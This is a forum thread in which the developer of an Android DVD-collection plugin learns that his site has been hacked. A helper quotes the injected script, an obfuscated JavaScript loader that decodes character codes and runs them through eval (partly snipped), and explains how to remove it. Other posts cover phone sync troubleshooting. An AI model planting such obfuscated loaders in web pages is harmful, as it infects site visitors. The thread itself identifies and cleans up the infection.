Thank you for finding that. But where is that code ? in the forum source, in a signature or in a post ? How can I remove that crap ?

Thank you again for helping me.

It looks like it's part of the header which possible means part of the forum source. It's sent after the HTML for User List/Rules/Search and just before the HTML for Forum/Topics/Posts.

If you have full control over the files, search for "hgberger". You should see it as part of a line reading as:
<script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29n-29n67[snip]21n-25n-29n-29n87'][0].split('n');md='a';e=window["e"+"val"];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script>

That whole line from <script> to </script> needs to be removed.

I would also notify your hosting provider, it seems like your server may have been hacked or the forum kit altered.

Dr. Killpatient : thank you for your help.

I've searched and found that all index.html files are infected with this crap.

As I'm not familiar with internet config & security, and I don't want to loose my time with this, so I will close my site soon and find a free hosted forum. I'm not sure I can backup threads, so I'll probably make cut/paste for main threads (release and versions).

Sorry for the problem it may cause to you. The hacker may be proud of making people loose time and effort. I even tought of leaving the project and keeping it for me alone.

Regards,

Olivier.

I'm sorry your site was hacked, but as invelos hasn't released an android app, please don't give up on your app.
I appreciate it must be very disheartening when your hard work is treated this way, but I & many others are grateful for the time & effort you have taken to help others.

If you run your own host, make sure you have all ports locked out except for ones you want people to access, such as port 80 for web traffic. I've been running mine with a Mac server (and a Windows server prior to that) and no known intrusions so far.

My site was hosted at OVH, and I have no idea if I messed up the security of my site, or if the server at OVH was hacked.

Anyway, I'm building a new forum or blog somewhere on a free host (please let me a few days), and I'll post here the new location, and update thread #1 with links.

Hi!

Fist part of answer: Don't Panic! (I wish I had a big red button graphic

Nest: go back through this thread. There are at least three discussions on issues regarding the beta plugin and the problems with phones being detected.
Simple solution: no automatic detect of phone at this time. You need to be in disk mode (or whatever it is called for your phone). THEN, from inside the plugin find droid_dvdp_is_here.
Check "Copy database to device" and "Synchronize covers" and click on "Export Collection".

You need to be in USB debugging mode (or however it is phrased for your phone) and have the USB drivers for your phone installed on the computer.

Check your phone, your should be good to go. Any more issues, come on back, we'll help figure them out.

OK, simple answer is yes.

Now the questions start:
1) Phone or tablet?

2) If phone what brand?  Have the drivers for Windows been installed on your computer?

3) Is the program installed?  Depending on brand of phone, can even be done from Windows desktop with the sync software.

  Let us know.

The new forum is here :

http://dvdp.discutfree.com/

It is not possible for the moment to register and post, but there are links to app.

I removed eveything on my old site (I didn't want to edit more than 300 index.html files to remove the crappy code), and placed a link to the new forums. I asked google to re-evaluate the site, and this may take a while.
